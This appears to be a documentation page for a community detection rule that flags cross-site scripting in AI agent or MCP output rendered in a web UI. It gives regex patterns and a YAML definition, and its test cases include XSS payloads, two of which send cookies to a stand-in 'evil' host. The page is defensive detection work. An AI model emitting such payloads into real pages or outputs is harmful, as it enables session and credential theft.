Skip to content
ATR-2026-00571high上下文外洩experimental

Cross-site scripting (XSS) in agent / MCP rendered output

Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.

嚴重度
high
類別
上下文外洩
掃描目標
runtime
作者
ATR Community

建議回應

alert

參考資料

OWASP Agentic
ASI01:2026 - Agent Goal Hijack
OWASP LLM
LLM02:2025 - Sensitive Information Disclosure
MITRE ATLAS
AML.T0057 - LLM Data Leakage

偵測條件

組合方式: any
  1. 01
    HTML event handler executing alert/eval/document.cookie
    欄位: content運算子: regex
  2. 02
    javascript: scheme with an executable payload
    欄位: content運算子: regex
  3. 03
    <script> exfiltrating cookies / loading remote code
    欄位: content運算子: regex

攻擊範例(規則會觸發)

  1. <img src=x onerror=alert(document.cookie)>
  2. <a href="javascript:fetch('//evil/'+document.cookie)">
  3. <script>new Image().src='//evil/?c='+document.cookie</script>

以上為真實攻擊 payload 的脫敏版本,與規則一同版本化,作為 regression test——確保未來的修訂不會悄悄漏掉它們。

正常樣本(規則不會觸發)

  1. benign 1
    <button onclick="handleSubmit()">Save</button>
  2. benign 2
    <script src="https://cdn.example.com/lib.js"></script>
  3. benign 3
    <a href="https://example.com">link</a>
  4. benign 4
    See the onload event in the docs

完整 YAML 定義

在 GitHub 編輯 →
title: Cross-site scripting (XSS) in agent / MCP rendered output
id: ATR-2026-00571
rule_version: 1
status: experimental
description: 'Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.'
author: ATR Community
date: 2026/06/02
schema_version: '0.1'
detection_tier: pattern
maturity: test
severity: high
references:
  cve:
  - CVE-2025-62800
  - CVE-2026-44429
  - CVE-2026-27740
  - CVE-2026-21866
  cwe:
  - CWE-79
  external:
  - https://github.com/jlowin/fastmcp/security/advisories
  owasp_llm:
    - LLM02:2025 - Sensitive Information Disclosure
  owasp_agentic:
    - ASI01:2026 - Agent Goal Hijack
  mitre_atlas:
    - AML.T0057 - LLM Data Leakage
metadata_provenance:
  cve: human-authored
  cwe: human-authored
compliance:
  eu_ai_act:
    - article: "15"
      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - article: "10"
      context: "Article 10 (data and data governance) requires control over the data an AI system processes; this rule provides detection evidence for the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) affecting that data."
      strength: secondary
  nist_ai_rmf:
    - subcategory: "MS.2.7"
      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - subcategory: "MS.2.10"
      context: "NIST AI RMF MEASURE 2.10 (privacy risk examined and documented) is supported by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: secondary
  iso_42001:
    - clause: "8.1"
      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - clause: "6.2"
      context: "ISO/IEC 42001 Clause 6.2 (AI objectives and planning) calls for risk treatment of known attack patterns; this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) is such a treatment."
      strength: secondary
tags:
  category: context-exfiltration
  scan_target: runtime
  confidence: high
agent_source:
  type: llm_io
  framework:
  - any
  provider:
  - any
detection:
  condition: any
  false_positives: []
  conditions:
  - field: content
    operator: regex
    value: (?i)\bon(?:error|load|mouseover|click|focus|toggle)\s*=\s*[\"']?\s*(?:alert|eval|fetch|document\.(?:cookie|location|write)|window\.|location\s*=|String\.fromCharCode|atob)\b
    description: HTML event handler executing alert/eval/document.cookie
  - field: content
    operator: regex
    value: (?i)javascript:\s*(?:alert|eval|document\.|window\.|fetch|String\.fromCharCode|void)
    description: 'javascript: scheme with an executable payload'
  - field: content
    operator: regex
    value: (?i)<script[^>]*>[^<]{0,200}?(?:document\.cookie|fetch\(|eval\(|atob\(|new\s+Image\(\)\.src|\.src\s*=\s*[\"']?https?://)
    description: <script> exfiltrating cookies / loading remote code
response:
  actions:
  - alert
  notify:
  - security_team
test_cases:
  true_positives:
  - input: <img src=x onerror=alert(document.cookie)>
    expected: triggered
    description: attack 1
  - input: <a href="javascript:fetch('//evil/'+document.cookie)">
    expected: triggered
    description: attack 2
  - input: <script>new Image().src='//evil/?c='+document.cookie</script>
    expected: triggered
    description: attack 3
  true_negatives:
  - input: <button onclick="handleSubmit()">Save</button>
    expected: not_triggered
    description: benign 1
  - input: <script src="https://cdn.example.com/lib.js"></script>
    expected: not_triggered
    description: benign 2
  - input: <a href="https://example.com">link</a>
    expected: not_triggered
    description: benign 3
  - input: See the onload event in the docs
    expected: not_triggered
    description: benign 4

修訂歷史

建立於
2026-06-02
最後修改
2026-07-15
在 GitHub 查看完整 commit 歷史 →